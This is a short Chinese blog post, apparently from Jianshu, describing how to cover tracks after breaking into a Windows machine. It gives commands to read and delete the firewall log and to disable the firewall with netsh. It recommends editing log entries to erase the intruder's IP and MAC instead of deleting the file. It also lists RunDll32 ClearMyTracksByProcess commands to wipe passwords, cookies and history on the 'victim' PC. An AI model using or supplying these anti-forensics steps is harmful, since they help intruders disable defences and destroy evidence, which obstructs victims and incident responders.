入侵Windows以后,删除防火墙记录

1、参考文章

2、推荐关注领英

前提环境:我们已经拿到了目标的shell,现在准备清理防火墙记录的痕迹。

cd logfiles/firewall
观察防火墙的当前目录
type pfirewall.log
读取防火墙日志
Netsh firewall set opmode mode= DISABLE
关闭防火墙
Del pfirewall.log

删除日志文件

type pfirewall.log

验证日志文件是否还在

注:这样是真的省事,可是少了大量日志记录,还是会被发现异常,所以删除带有自己访问记录的条目,或者修改日志内容是最好的选择。把自己的访问ip和,mac记录删除或者修改掉。

个人感觉,删除不是好的选择,你断开连接的时候,有的监管软件会记录你的离开,审核日志的时候,你有离开的记录,没有进入的记录,这就很让人怀疑了。

另:在远程受害者PC中删除Internet Explorer的密码/ Cookies /历史/临时Internet文件

参考文章

删除Internet临时文件
RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 8

删除cookies
RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 2

删除历史记录
RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 1

从数据中删除
RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 16

删除密码
RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 32

删除所有
RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 255

删除加载项存储的所有+文件和设置
RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 4351
最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • Spring Cloud
    Spring Cloud为开发人员提供了快速构建分布式系统中一些常见模式的工具(例如配置管理,服务发现,断路器,智...
    卡卡罗2017阅读 134,981评论 19 139
  • Java初级面试题
    1. Java基础部分 基础部分的顺序:基本语法,类相关的语法,内部类的语法,继承相关的语法,异常的语法,线程的语...
    子非鱼_t_阅读 31,767评论 18 399
  • 无标题笔记
    寻找一种易于理解的一致性算法(扩展版) 摘要 Raft 是一种为了管理复制日志的一致性算法。它提供了和 Paxos...
    yflau阅读 1,043评论 0 1
  • Spring boot参考指南
    Spring Boot 参考指南 介绍 转载自:https://www.gitbook.com/book/qbgb...
    毛宇鹏阅读 46,970评论 6 342
  • 晨读感悟  婚姻有金钱的味道
    参考书目:《谈钱不伤感情——影响夫妻关系的5种金钱人格》[美] 斯科特·帕尔默, 宝芬妮·帕尔默 不得不说,婚姻有...
    小苏Amy阅读 353评论 4 5